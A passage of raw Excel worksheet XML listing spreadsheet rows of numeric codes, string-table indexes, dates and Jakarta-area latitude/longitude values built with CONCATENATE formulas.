        <v>-6.15735,106.90724</v>
      </c>
    </row>
    <row r="573" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A573">
        <v>102297</v>
      </c>
      <c r="B573" s="1">
        <v>43869</v>
      </c>
      <c r="C573">
        <v>0</v>
      </c>
      <c r="D573" t="s">
        <v>22</v>
      </c>
      <c r="E573" t="s">
        <v>23</v>
      </c>
      <c r="F573" t="s">
        <v>2477</v>
      </c>
      <c r="G573" t="s">
        <v>2478</v>
      </c>
      <c r="H573" t="s">
        <v>26</v>
      </c>
      <c r="I573" t="s">
        <v>1389</v>
      </c>
      <c r="J573" t="s">
        <v>2479</v>
      </c>
      <c r="L573" t="s">
        <v>2480</v>
      </c>
      <c r="M573">
        <v>3172080005</v>
      </c>
      <c r="N573">
        <v>3172080</v>
      </c>
      <c r="O573">
        <v>3172</v>
      </c>
      <c r="P573">
        <v>31</v>
      </c>
      <c r="Q573" t="s">
        <v>140</v>
      </c>
      <c r="R573" t="s">
        <v>141</v>
      </c>
      <c r="S573" t="s">
        <v>49</v>
      </c>
      <c r="T573" t="s">
        <v>33</v>
      </c>
      <c r="U573" s="5">
        <v>10694786</v>
      </c>
      <c r="V573" s="5" t="s">
        <v>14984</v>
      </c>
      <c r="W573" s="5">
        <v>-619343</v>
      </c>
      <c r="X573" t="s">
        <v>18791</v>
      </c>
      <c r="Y573" t="str">
        <f t="shared" si="8"/>
        <v>-6.19343,106.94786</v>
      </c>
    </row>
    <row r="574" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A574">
        <v>102298</v>
      </c>
      <c r="B574" s="1">
        <v>43869</v>
      </c>
      <c r="C574">
        <v>0</v>
      </c>
      <c r="D574" t="s">
        <v>22</v>
      </c>
      <c r="E574" t="s">
        <v>23</v>
      </c>
      <c r="F574" t="s">
        <v>2481</v>
      </c>
      <c r="G574" t="s">
        <v>2482</v>
      </c>
      <c r="H574" t="s">
        <v>26</v>
      </c>
      <c r="I574" t="s">
        <v>1689</v>
      </c>
      <c r="J574" t="s">
        <v>1590</v>
      </c>
      <c r="L574" t="s">
        <v>2483</v>
      </c>
      <c r="M574">
        <v>3175050001</v>
      </c>
      <c r="N574">
        <v>3175050</v>
      </c>
      <c r="O574">
        <v>3175</v>
      </c>
      <c r="P574">
        <v>31</v>
      </c>
      <c r="Q574" t="s">
        <v>1037</v>
      </c>
      <c r="R574" t="s">
        <v>1013</v>
      </c>
      <c r="S574" t="s">
        <v>547</v>
      </c>
      <c r="T574" t="s">
        <v>33</v>
      </c>
      <c r="U574" s="5">
        <v>10688601</v>
      </c>
      <c r="V574" s="5" t="s">
        <v>14985</v>
      </c>
      <c r="W574" s="5">
        <v>-615515</v>
      </c>
      <c r="X574" t="s">
        <v>18792</v>
      </c>
      <c r="Y574" t="str">
        <f t="shared" si="8"/>
        <v>-6.15515,106.88601</v>
      </c>
    </row>
    <row r="575" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A575">
        <v>102299</v>
      </c>
      <c r="B575" s="1">
        <v>43869</v>
      </c>
      <c r="C575">
        <v>0</v>
      </c>
      <c r="D575" t="s">
        <v>22</v>
      </c>
      <c r="E575" t="s">
        <v>23</v>
      </c>
      <c r="F575" t="s">
        <v>2484</v>
      </c>
      <c r="H575" t="s">
        <v>26</v>
      </c>
      <c r="I575" t="s">
        <v>882</v>
      </c>
      <c r="J575" t="s">
        <v>2485</v>
      </c>
      <c r="L575" t="s">
        <v>2486</v>
      </c>
      <c r="M575">
        <v>3171080001</v>
      </c>
      <c r="N575">
        <v>3171080</v>
      </c>
      <c r="O575">
        <v>3171</v>
      </c>
      <c r="P575">
        <v>31</v>
      </c>
      <c r="Q575" t="s">
        <v>2265</v>
      </c>
      <c r="R575" t="s">
        <v>1403</v>
      </c>
      <c r="S575" t="s">
        <v>108</v>
      </c>
      <c r="T575" t="s">
        <v>33</v>
      </c>
      <c r="U575" s="5">
        <v>10683225</v>
      </c>
      <c r="V575" s="5" t="s">
        <v>14986</v>
      </c>
      <c r="W575" s="5">
        <v>-626857</v>
      </c>
      <c r="X575" t="s">
        <v>18793</v>
      </c>
      <c r="Y575" t="str">
        <f t="shared" si="8"/>
        <v>-6.26857,106.83225</v>
      </c>
    </row>
    <row r="576" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A576">
        <v>102300</v>
      </c>
      <c r="B576" s="1">
        <v>43869</v>
      </c>
      <c r="C576">
        <v>0</v>
      </c>
      <c r="D576" t="s">
        <v>22</v>
      </c>
      <c r="E576" t="s">
        <v>23</v>
      </c>
      <c r="F576" t="s">
        <v>2487</v>
      </c>
      <c r="G576" t="s">
        <v>2488</v>
      </c>
      <c r="H576" t="s">
        <v>26</v>
      </c>
      <c r="I576" t="s">
        <v>974</v>
      </c>
      <c r="J576" t="s">
        <v>2489</v>
      </c>
      <c r="L576" t="s">
        <v>2483</v>
      </c>
      <c r="M576">
        <v>3175030002</v>
      </c>
      <c r="N576">
        <v>3175030</v>
      </c>
      <c r="O576">
        <v>3175</v>
      </c>
      <c r="P576">
        <v>31</v>
      </c>
      <c r="Q576" t="s">
        <v>1592</v>
      </c>
      <c r="R576" t="s">
        <v>1563</v>
      </c>
      <c r="S576" t="s">
        <v>547</v>
      </c>
      <c r="T576" t="s">
        <v>33</v>
      </c>
      <c r="U576" s="5">
        <v>10688142</v>
      </c>
      <c r="V576" s="5" t="s">
        <v>14987</v>
      </c>
      <c r="W576" s="5">
        <v>-616227</v>
      </c>
      <c r="X576" t="s">
        <v>18794</v>
      </c>
      <c r="Y576" t="str">
        <f t="shared" si="8"/>
        <v>-6.16227,106.88142</v>
      </c>
    </row>
    <row r="577" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A577">
        <v>102301</v>
      </c>
      <c r="B577" s="1">
        <v>43869</v>
      </c>
      <c r="C577">
        <v>0</v>
      </c>
      <c r="D577" t="s">
        <v>22</v>
      </c>
      <c r="E577" t="s">
        <v>23</v>
      </c>
      <c r="F577" t="s">
        <v>2490</v>
      </c>
      <c r="H577" t="s">
        <v>26</v>
      </c>
      <c r="I577" t="s">
        <v>1633</v>
      </c>
      <c r="J577" t="s">
        <v>37</v>
      </c>
      <c r="L577" t="s">
        <v>2491</v>
      </c>
      <c r="M577">
        <v>3275060003</v>
      </c>
      <c r="N577">
        <v>3275060</v>
      </c>
      <c r="O577">
        <v>3275</v>
      </c>
      <c r="P577">
        <v>32</v>
      </c>
      <c r="Q577" t="s">
        <v>146</v>
      </c>
      <c r="R577" t="s">
        <v>114</v>
      </c>
      <c r="S577" t="s">
        <v>41</v>
      </c>
      <c r="T577" t="s">
        <v>42</v>
      </c>
      <c r="U577" s="5">
        <v>10696938</v>
      </c>
      <c r="V577" s="5" t="s">
        <v>14988</v>
      </c>
      <c r="W577" s="5">
        <v>-622536</v>
      </c>
      <c r="X577" t="s">
        <v>18795</v>
      </c>
      <c r="Y577" t="str">
        <f t="shared" si="8"/>
        <v>-6.22536,106.96938</v>
      </c>
    </row>
    <row r="578" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A578">
        <v>102302</v>
      </c>
      <c r="B578" s="1">
        <v>43869</v>
      </c>
      <c r="C578">
        <v>0</v>
      </c>
      <c r="D578" t="s">
        <v>22</v>
      </c>
      <c r="E578" t="s">
        <v>23</v>
      </c>
      <c r="F578" t="s">
        <v>2492</v>
      </c>
      <c r="G578" t="s">
        <v>2493</v>
      </c>
      <c r="H578" t="s">
        <v>26</v>
      </c>
      <c r="I578" t="s">
        <v>974</v>
      </c>
      <c r="J578" t="s">
        <v>2494</v>
      </c>
      <c r="L578" t="s">
        <v>2495</v>
      </c>
      <c r="M578">
        <v>3175050001</v>
      </c>
      <c r="N578">
        <v>3175050</v>
      </c>
      <c r="O578">
        <v>3175</v>
      </c>
      <c r="P578">
        <v>31</v>
      </c>
      <c r="Q578" t="s">
        <v>1037</v>
      </c>
      <c r="R578" t="s">
        <v>1013</v>
      </c>
      <c r="S578" t="s">
        <v>547</v>
      </c>
      <c r="T578" t="s">
        <v>33</v>
      </c>
      <c r="U578" s="5">
        <v>10690329</v>
      </c>
      <c r="V578" s="5" t="s">
        <v>14989</v>
      </c>
      <c r="W578" s="5">
        <v>-614653</v>
      </c>
      <c r="X578" t="s">
        <v>18796</v>
      </c>
      <c r="Y578" t="str">
        <f t="shared" si="8"/>
        <v>-6.14653,106.90329</v>
      </c>
    </row>
    <row r="579" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A579">
        <v>102303</v>
      </c>
      <c r="B579" s="1">
        <v>43869</v>
      </c>
      <c r="C579">
        <v>0</v>
      </c>
      <c r="D579" t="s">
        <v>22</v>
      </c>
      <c r="E579" t="s">
        <v>23</v>
      </c>
      <c r="F579" t="s">
        <v>2496</v>
      </c>
      <c r="G579" t="s">
        <v>2497</v>
      </c>
      <c r="H579" t="s">
        <v>26</v>
      </c>
      <c r="I579" t="s">
        <v>886</v>
      </c>
      <c r="J579" t="s">
        <v>2498</v>
      </c>
      <c r="L579" t="s">
        <v>2499</v>
      </c>
      <c r="M579">
        <v>3173010003</v>
      </c>
      <c r="N579">
        <v>3173010</v>
      </c>
      <c r="O579">
        <v>3173</v>
      </c>
      <c r="P579">
        <v>31</v>
      </c>
      <c r="Q579" t="s">
        <v>2338</v>
      </c>
      <c r="R579" t="s">
        <v>1481</v>
      </c>
      <c r="S579" t="s">
        <v>62</v>
      </c>
      <c r="T579" t="s">
        <v>33</v>
      </c>
      <c r="U579" s="5">
        <v>10681385</v>
      </c>
      <c r="V579" s="5" t="s">
        <v>14990</v>
      </c>
      <c r="W579" s="5">
        <v>-620644</v>
      </c>
      <c r="X579" t="s">
        <v>18797</v>
      </c>
      <c r="Y579" t="str">
        <f t="shared" ref="Y579:Y642" si="9">CONCATENATE(X579,",",V579)</f>
        <v>-6.20644,106.81385</v>
      </c>
    </row>
    <row r="580" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A580">
        <v>102304</v>
      </c>
      <c r="B580" s="1">
        <v>43869</v>
      </c>
      <c r="C580">
        <v>0</v>
      </c>
      <c r="D580" t="s">
        <v>22</v>
      </c>
      <c r="E580" t="s">
        <v>23</v>
      </c>
      <c r="F580" t="s">
        <v>2500</v>
      </c>
      <c r="G580" t="s">
        <v>2501</v>
      </c>
      <c r="H580" t="s">
        <v>26</v>
      </c>
      <c r="I580" t="s">
        <v>65</v>
      </c>
      <c r="J580" t="s">
        <v>2502</v>
      </c>
      <c r="L580" t="s">
        <v>2503</v>
      </c>
      <c r="M580">
        <v>3175060001</v>
      </c>
      <c r="N580">
        <v>3175060</v>
      </c>
      <c r="O580">
        <v>3175</v>
      </c>
      <c r="P580">
        <v>31</v>
      </c>
      <c r="Q580" t="s">
        <v>2278</v>
      </c>
      <c r="R580" t="s">
        <v>2279</v>
      </c>
      <c r="S580" t="s">
        <v>547</v>
      </c>
      <c r="T580" t="s">
        <v>33</v>
      </c>
      <c r="U580" s="5">
        <v>10691853</v>
      </c>
      <c r="V580" s="5" t="s">
        <v>14991</v>
      </c>
      <c r="W580" s="5">
        <v>-613907</v>
      </c>
      <c r="X580" t="s">
        <v>18798</v>
      </c>
      <c r="Y580" t="str">
        <f t="shared" si="9"/>
        <v>-6.13907,106.91853</v>
      </c>
    </row>
    <row r="581" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A581">
        <v>102305</v>
      </c>
      <c r="B581" s="1">
        <v>43869</v>
      </c>
      <c r="C581">
        <v>0</v>
      </c>
      <c r="D581" t="s">
        <v>22</v>
      </c>
      <c r="E581" t="s">
        <v>23</v>
      </c>
      <c r="F581" t="s">
        <v>2504</v>
      </c>
      <c r="G581" t="s">
        <v>2505</v>
      </c>
      <c r="H581" t="s">
        <v>26</v>
      </c>
      <c r="I581" t="s">
        <v>1439</v>
      </c>
      <c r="J581" t="s">
        <v>2506</v>
      </c>
      <c r="L581" t="s">
        <v>2507</v>
      </c>
      <c r="M581">
        <v>3172060008</v>
      </c>
      <c r="N581">
        <v>3172060</v>
      </c>
      <c r="O581">
        <v>3172</v>
      </c>
      <c r="P581">
        <v>31</v>
      </c>
      <c r="Q581" t="s">
        <v>1096</v>
      </c>
      <c r="R581" t="s">
        <v>48</v>
      </c>
      <c r="S581" t="s">
        <v>49</v>
      </c>
      <c r="T581" t="s">
        <v>33</v>
      </c>
      <c r="U581" s="5">
        <v>10685956</v>
      </c>
      <c r="V581" s="5" t="s">
        <v>14992</v>
      </c>
      <c r="W581" s="5">
        <v>-621562</v>
      </c>
      <c r="X581" t="s">
        <v>18320</v>
      </c>
      <c r="Y581" t="str">
        <f t="shared" si="9"/>
        <v>-6.21562,106.85956</v>
      </c>
    </row>
    <row r="582" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A582">
        <v>102306</v>
      </c>
      <c r="B582" s="1">
        <v>43869</v>
      </c>
      <c r="C582">
        <v>0</v>
      </c>
      <c r="D582" t="s">
        <v>22</v>
      </c>
      <c r="E582" t="s">
        <v>23</v>
      </c>
      <c r="F582" t="s">
        <v>2508</v>
      </c>
      <c r="G582" t="s">
        <v>2509</v>
      </c>
      <c r="H582" t="s">
        <v>26</v>
      </c>
      <c r="I582" t="s">
        <v>1194</v>
      </c>
      <c r="J582" t="s">
        <v>37</v>
      </c>
      <c r="L582" t="s">
        <v>2510</v>
      </c>
      <c r="M582">
        <v>3216081006</v>
      </c>
      <c r="N582">
        <v>3216081</v>
      </c>
      <c r="O582">
        <v>3216</v>
      </c>
      <c r="P582">
        <v>32</v>
      </c>
      <c r="Q582" t="s">
        <v>2511</v>
      </c>
      <c r="R582" t="s">
        <v>2512</v>
      </c>
      <c r="S582" t="s">
        <v>41</v>
      </c>
      <c r="T582" t="s">
        <v>42</v>
      </c>
      <c r="U582" s="5">
        <v>10704727</v>
      </c>
      <c r="V582" s="5" t="s">
        <v>14993</v>
      </c>
      <c r="W582" s="5">
        <v>-624044</v>
      </c>
      <c r="X582" t="s">
        <v>18799</v>
      </c>
      <c r="Y582" t="str">
        <f t="shared" si="9"/>
        <v>-6.24044,107.04727</v>
      </c>
    </row>
    <row r="583" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A583">
        <v>102307</v>
      </c>
      <c r="B583" s="1">
        <v>43869</v>
      </c>
      <c r="C583">
        <v>0</v>
      </c>
      <c r="D583" t="s">
        <v>85</v>
      </c>
      <c r="E583" t="s">
        <v>23</v>
      </c>
      <c r="F583" t="s">
        <v>2513</v>
      </c>
      <c r="G583" t="s">
        <v>2514</v>
      </c>
      <c r="H583" t="s">
        <v>26</v>
      </c>
      <c r="J583" t="s">
        <v>2059</v>
      </c>
      <c r="K583" t="s">
        <v>2515</v>
      </c>
      <c r="L583" t="s">
        <v>2516</v>
      </c>
      <c r="M583">
        <v>3175040003</v>
      </c>
      <c r="N583">
        <v>3175040</v>
      </c>
      <c r="O583">
        <v>3175</v>
      </c>
      <c r="P583">
        <v>31</v>
      </c>
      <c r="Q583" t="s">
        <v>2062</v>
      </c>
      <c r="R583" t="s">
        <v>2063</v>
      </c>
      <c r="S583" t="s">
        <v>547</v>
      </c>
      <c r="T583" t="s">
        <v>33</v>
      </c>
      <c r="U583" s="5">
        <v>10690780</v>
      </c>
      <c r="V583" s="5" t="s">
        <v>14994</v>
      </c>
      <c r="W583" s="5">
        <v>-612330</v>
      </c>
      <c r="X583" t="s">
        <v>18800</v>
      </c>
      <c r="Y583" t="str">
        <f t="shared" si="9"/>
        <v>-6.12330,106.90780</v>
      </c>
    </row>
    <row r="584" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A584">
        <v>102308</v>
      </c>
      <c r="B584" s="1">
        <v>43869</v>
      </c>
      <c r="C584">
        <v>0</v>
      </c>
      <c r="D584" t="s">
        <v>22</v>
      </c>
      <c r="E584" t="s">
        <v>23</v>
      </c>
      <c r="F584" t="s">
        <v>2517</v>
      </c>
      <c r="H584" t="s">
        <v>26</v>
      </c>
      <c r="I584" t="s">
        <v>1099</v>
      </c>
      <c r="J584" t="s">
        <v>2518</v>
      </c>
      <c r="L584" t="s">
        <v>2519</v>
      </c>
      <c r="M584">
        <v>3173010006</v>
      </c>
      <c r="N584">
        <v>3173010</v>
      </c>
      <c r="O584">
        <v>3173</v>
      </c>
      <c r="P584">
        <v>31</v>
      </c>
      <c r="Q584" t="s">
        <v>2520</v>
      </c>
      <c r="R584" t="s">
        <v>1481</v>
      </c>
      <c r="S584" t="s">
        <v>62</v>
      </c>
      <c r="T584" t="s">
        <v>33</v>
      </c>
      <c r="U584" s="5">
        <v>10681119</v>
      </c>
      <c r="V584" s="5" t="s">
        <v>14995</v>
      </c>
      <c r="W584" s="5">
        <v>-619150</v>
      </c>
      <c r="X584" t="s">
        <v>18801</v>
      </c>
      <c r="Y584" t="str">
        <f t="shared" si="9"/>
        <v>-6.19150,106.81119</v>
      </c>
    </row>
    <row r="585" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A585">
        <v>102309</v>
      </c>
      <c r="B585" s="1">
        <v>43869</v>
      </c>
      <c r="C585">
        <v>0</v>
      </c>
      <c r="D585" t="s">
        <v>22</v>
      </c>
      <c r="E585" t="s">
        <v>23</v>
      </c>
      <c r="F585" t="s">
        <v>2521</v>
      </c>
      <c r="G585" t="s">
        <v>2522</v>
      </c>
      <c r="H585" t="s">
        <v>26</v>
      </c>
      <c r="I585" t="s">
        <v>517</v>
      </c>
      <c r="J585" t="s">
        <v>2523</v>
      </c>
      <c r="L585" t="s">
        <v>2524</v>
      </c>
      <c r="M585">
        <v>3175050001</v>
      </c>
      <c r="N585">
        <v>3175050</v>
      </c>
      <c r="O585">
        <v>3175</v>
      </c>
      <c r="P585">
        <v>31</v>
      </c>
      <c r="Q585" t="s">
        <v>1037</v>
      </c>
      <c r="R585" t="s">
        <v>1013</v>
      </c>
      <c r="S585" t="s">
        <v>547</v>
      </c>
      <c r="T585" t="s">
        <v>33</v>
      </c>
      <c r="U585" s="5">
        <v>10688980</v>
      </c>
      <c r="V585" s="5" t="s">
        <v>14996</v>
      </c>
      <c r="W585" s="5">
        <v>-615128</v>
      </c>
      <c r="X585" t="s">
        <v>18802</v>
      </c>
      <c r="Y585" t="str">
        <f t="shared" si="9"/>
        <v>-6.15128,106.88980</v>
      </c>
    </row>
    <row r="586" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A586">
        <v>102310</v>
      </c>
      <c r="B586" s="1">
        <v>43869</v>
      </c>
      <c r="C586">
        <v>0</v>
      </c>
      <c r="D586" t="s">
        <v>22</v>
      </c>
      <c r="E586" t="s">
        <v>23</v>
      </c>
      <c r="F586" t="s">
        <v>2525</v>
      </c>
      <c r="G586" t="s">
        <v>2526</v>
      </c>
      <c r="H586" t="s">
        <v>26</v>
      </c>
      <c r="I586" t="s">
        <v>1359</v>
      </c>
      <c r="J586" t="s">
        <v>2527</v>
      </c>
      <c r="L586" t="s">
        <v>2528</v>
      </c>
      <c r="M586">
        <v>3174030006</v>
      </c>
      <c r="N586">
        <v>3174030</v>
      </c>
      <c r="O586">
        <v>3174</v>
      </c>
      <c r="P586">
        <v>31</v>
      </c>
      <c r="Q586" t="s">
        <v>2529</v>
      </c>
      <c r="R586" t="s">
        <v>1487</v>
      </c>
      <c r="S586" t="s">
        <v>32</v>
      </c>
      <c r="T586" t="s">
        <v>33</v>
      </c>
      <c r="U586" s="5">
        <v>10680597</v>
      </c>
      <c r="V586" s="5" t="s">
        <v>14997</v>
      </c>
      <c r="W586" s="5">
        <v>-618027</v>
      </c>
      <c r="X586" t="s">
        <v>18803</v>
      </c>
      <c r="Y586" t="str">
        <f t="shared" si="9"/>
        <v>-6.18027,106.80597</v>
      </c>
    </row>
    <row r="587" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A587">
        <v>102311</v>
      </c>
      <c r="B587" s="1">
        <v>43869</v>
      </c>
      <c r="C587">
        <v>0</v>
      </c>
      <c r="D587" t="s">
        <v>22</v>
      </c>
      <c r="E587" t="s">
        <v>23</v>
      </c>
      <c r="F587" t="s">
        <v>2530</v>
      </c>
      <c r="G587" t="s">
        <v>2531</v>
      </c>
      <c r="H587" t="s">
        <v>26</v>
      </c>
      <c r="I587" t="s">
        <v>1447</v>
      </c>
      <c r="J587" t="s">
        <v>2532</v>
      </c>
      <c r="L587" t="s">
        <v>2533</v>
      </c>
      <c r="M587">
        <v>3172040003</v>
      </c>
      <c r="N587">
        <v>3172040</v>
      </c>
      <c r="O587">
        <v>3172</v>
      </c>
      <c r="P587">
        <v>31</v>
      </c>
      <c r="Q587" t="s">
        <v>552</v>
      </c>
      <c r="R587" t="s">
        <v>281</v>
      </c>
      <c r="S587" t="s">
        <v>49</v>
      </c>
      <c r="T587" t="s">
        <v>33</v>
      </c>
      <c r="U587" s="5">
        <v>10687889</v>
      </c>
      <c r="V587" s="5" t="s">
        <v>14998</v>
      </c>
      <c r="W587" s="5">
        <v>-626313</v>
      </c>
      <c r="X587" t="s">
        <v>18804</v>
      </c>
      <c r="Y587" t="str">
        <f t="shared" si="9"/>
        <v>-6.26313,106.87889</v>
      </c>
    </row>
    <row r="588" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A588">
        <v>102312</v>
      </c>
      <c r="B588" s="1">
        <v>43869</v>
      </c>
      <c r="C588">
        <v>0</v>
      </c>
      <c r="D588" t="s">
        <v>22</v>
      </c>
      <c r="E588" t="s">
        <v>23</v>
      </c>
      <c r="F588" t="s">
        <v>2534</v>
      </c>
      <c r="G588" t="s">
        <v>2535</v>
      </c>
      <c r="H588" t="s">
        <v>26</v>
      </c>
      <c r="I588" t="s">
        <v>1891</v>
      </c>
      <c r="J588" t="s">
        <v>2536</v>
      </c>
      <c r="L588" t="s">
        <v>2537</v>
      </c>
      <c r="M588">
        <v>3172040005</v>
      </c>
      <c r="N588">
        <v>3172040</v>
      </c>
      <c r="O588">
        <v>3172</v>
      </c>
      <c r="P588">
        <v>31</v>
      </c>
      <c r="Q588" t="s">
        <v>1351</v>
      </c>
      <c r="R588" t="s">
        <v>281</v>
      </c>
      <c r="S588" t="s">
        <v>49</v>
      </c>
      <c r="T588" t="s">
        <v>33</v>
      </c>
      <c r="U588" s="5">
        <v>10690071</v>
      </c>
      <c r="V588" s="5" t="s">
        <v>14999</v>
      </c>
      <c r="W588" s="5">
        <v>-624776</v>
      </c>
      <c r="X588" t="s">
        <v>18805</v>
      </c>
      <c r="Y588" t="str">
        <f t="shared" si="9"/>
        <v>-6.24776,106.90071</v>
      </c>
    </row>
    <row r="589" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A589">
        <v>102313</v>
      </c>
      <c r="B589" s="1">
        <v>43869</v>
      </c>
      <c r="C589">
        <v>0</v>
      </c>
      <c r="D589" t="s">
        <v>22</v>
      </c>
      <c r="E589" t="s">
        <v>23</v>
      </c>
      <c r="F589" t="s">
        <v>2538</v>
      </c>
      <c r="G589" t="s">
        <v>2539</v>
      </c>
      <c r="H589" t="s">
        <v>26</v>
      </c>
      <c r="I589" t="s">
        <v>197</v>
      </c>
      <c r="J589" t="s">
        <v>2540</v>
      </c>
      <c r="L589" t="s">
        <v>2541</v>
      </c>
      <c r="M589">
        <v>3172040005</v>
      </c>
      <c r="N589">
        <v>3172040</v>
      </c>
      <c r="O589">
        <v>3172</v>
      </c>
      <c r="P589">
        <v>31</v>
      </c>
      <c r="Q589" t="s">
        <v>1351</v>
      </c>
      <c r="R589" t="s">
        <v>281</v>
      </c>
      <c r="S589" t="s">
        <v>49</v>
      </c>
      <c r="T589" t="s">
        <v>33</v>
      </c>
      <c r="U589" s="5">
        <v>10689180</v>
      </c>
      <c r="V589" s="5" t="s">
        <v>15000</v>
      </c>
      <c r="W589" s="5">
        <v>-624150</v>
      </c>
      <c r="X589" t="s">
        <v>18806</v>
      </c>
      <c r="Y589" t="str">
        <f t="shared" si="9"/>
        <v>-6.24150,106.89180</v>
      </c>
    </row>
    <row r="590" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A590">
        <v>102315</v>
      </c>
      <c r="B590" s="1">
        <v>43869</v>
      </c>
      <c r="C590">
        <v>0</v>
      </c>
      <c r="D590" t="s">
        <v>22</v>
      </c>
      <c r="E590" t="s">
        <v>23</v>
      </c>
      <c r="F590" t="s">
        <v>2542</v>
      </c>
      <c r="G590" t="s">
        <v>2543</v>
      </c>
      <c r="H590" t="s">
        <v>26</v>
      </c>
      <c r="I590" t="s">
        <v>76</v>
      </c>
      <c r="J590" t="s">
        <v>2544</v>
      </c>
      <c r="L590" t="s">
        <v>2545</v>
      </c>
      <c r="M590">
        <v>3173010003</v>
      </c>
      <c r="N590">
        <v>3173010</v>
      </c>
      <c r="O590">
        <v>3173</v>
      </c>
      <c r="P590">
        <v>31</v>
      </c>
      <c r="Q590" t="s">
        <v>2338</v>
      </c>
      <c r="R590" t="s">
        <v>1481</v>
      </c>
      <c r="S590" t="s">
        <v>62</v>
      </c>
      <c r="T590" t="s">
        <v>33</v>
      </c>
      <c r="U590" s="5">
        <v>10681895</v>
      </c>
      <c r="V590" s="5" t="s">
        <v>15001</v>
      </c>
      <c r="W590" s="5">
        <v>-620446</v>
      </c>
      <c r="X590" t="s">
        <v>18807</v>
      </c>
      <c r="Y590" t="str">
        <f t="shared" si="9"/>
        <v>-6.20446,106.81895</v>
      </c>
    </row>
    <row r="591" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A591">
        <v>102316</v>
      </c>
      <c r="B591" s="1">
        <v>43869</v>
      </c>
      <c r="C591">
        <v>0</v>
      </c>
      <c r="D591" t="s">
        <v>22</v>
      </c>
      <c r="E591" t="s">
        <v>23</v>
      </c>
      <c r="F591" t="s">
        <v>2546</v>
      </c>
      <c r="G591" t="s">
        <v>2547</v>
      </c>
      <c r="H591" t="s">
        <v>26</v>
      </c>
      <c r="I591" t="s">
        <v>2548</v>
      </c>
      <c r="J591" t="s">
        <v>444</v>
      </c>
      <c r="L591" t="s">
        <v>2549</v>
      </c>
      <c r="M591">
        <v>3174020005</v>
      </c>
      <c r="N591">
        <v>3174020</v>
      </c>
      <c r="O591">
        <v>3174</v>
      </c>
      <c r="P591">
        <v>31</v>
      </c>
      <c r="Q591" t="s">
        <v>30</v>
      </c>
      <c r="R591" t="s">
        <v>31</v>
      </c>
      <c r="S591" t="s">
        <v>32</v>
      </c>
      <c r="T591" t="s">
        <v>33</v>
      </c>
      <c r="U591" s="5">
        <v>10677638</v>
      </c>
      <c r="V591" s="5" t="s">
        <v>15002</v>
      </c>
      <c r="W591" s="5">
        <v>-617342</v>
      </c>
      <c r="X591" t="s">
        <v>18808</v>
      </c>
      <c r="Y591" t="str">
        <f t="shared" si="9"/>
        <v>-6.17342,106.77638</v>
      </c>
    </row>
    <row r="592" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A592">
        <v>102317</v>
      </c>
      <c r="B592" s="1">
        <v>43869</v>
      </c>
      <c r="C592">
        <v>0</v>
      </c>
      <c r="D592" t="s">
        <v>22</v>
      </c>
      <c r="E592" t="s">
        <v>23</v>
      </c>
      <c r="F592" t="s">
        <v>2550</v>
      </c>
      <c r="H592" t="s">
        <v>26</v>
      </c>
      <c r="I592" t="s">
        <v>2300</v>
      </c>
      <c r="J592" t="s">
        <v>1460</v>
      </c>
      <c r="L592" t="s">
        <v>2551</v>
      </c>
      <c r="M592">
        <v>3211020001</v>
      </c>
      <c r="N592">
        <v>3211020</v>
      </c>
      <c r="O592">
        <v>3211</v>
      </c>
      <c r="P592">
        <v>32</v>
      </c>
      <c r="Q592" t="s">
        <v>1795</v>
      </c>
      <c r="R592" t="s">
        <v>1796</v>
      </c>
      <c r="S592" t="s">
        <v>1797</v>
      </c>
      <c r="T592" t="s">
        <v>42</v>
      </c>
      <c r="U592" s="5">
        <v>10779183</v>
      </c>
      <c r="V592" s="5" t="s">
        <v>15003</v>
      </c>
      <c r="W592" s="5">
        <v>-696145</v>
      </c>
      <c r="X592" t="s">
        <v>18809</v>
      </c>
      <c r="Y592" t="str">
        <f t="shared" si="9"/>
        <v>-6.96145,107.79183</v>
      </c>
    </row>
    <row r="593" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A593">
        <v>102318</v>
      </c>
      <c r="B593" s="1">
        <v>43869</v>
      </c>
      <c r="C593">
        <v>0</v>
      </c>
      <c r="D593" t="s">
        <v>22</v>
      </c>
      <c r="E593" t="s">
        <v>23</v>
      </c>
      <c r="F593" t="s">
        <v>2552</v>
      </c>
      <c r="G593" t="s">
        <v>2553</v>
      </c>
      <c r="H593" t="s">
        <v>26</v>
      </c>
      <c r="I593" t="s">
        <v>27</v>
      </c>
      <c r="J593" t="s">
        <v>2554</v>
      </c>
      <c r="L593" t="s">
        <v>2555</v>
      </c>
      <c r="M593">
        <v>3172040002</v>
      </c>
      <c r="N593">
        <v>3172040</v>
      </c>
      <c r="O593">
        <v>3172</v>
      </c>
      <c r="P593">
        <v>31</v>
      </c>
      <c r="Q593" t="s">
        <v>281</v>
      </c>
      <c r="R593" t="s">
        <v>281</v>
      </c>
      <c r="S593" t="s">
        <v>49</v>
      </c>
      <c r="T593" t="s">
        <v>33</v>
      </c>
      <c r="U593" s="5">
        <v>10687562</v>
      </c>
      <c r="V593" s="5" t="s">
        <v>15004</v>
      </c>
      <c r="W593" s="5">
        <v>-627895</v>
      </c>
      <c r="X593" t="s">
        <v>18810</v>
      </c>
      <c r="Y593" t="str">
        <f t="shared" si="9"/>
        <v>-6.27895,106.87562</v>
      </c>
    </row>
    <row r="594" spans="1:25" x14ac:dyDescent="0.25">
      <c r="A594">
        <v>102319</v>
      </c>
      <c r="B594" s="1">
        <v>43869</v>
      </c>
      <c r="C594">
        <v>0</v>
      </c>
      <c r="D594" t="s">
        <v>22</v>
      </c>
      <c r="E594" t="s">
        <v>23</v>
      </c>
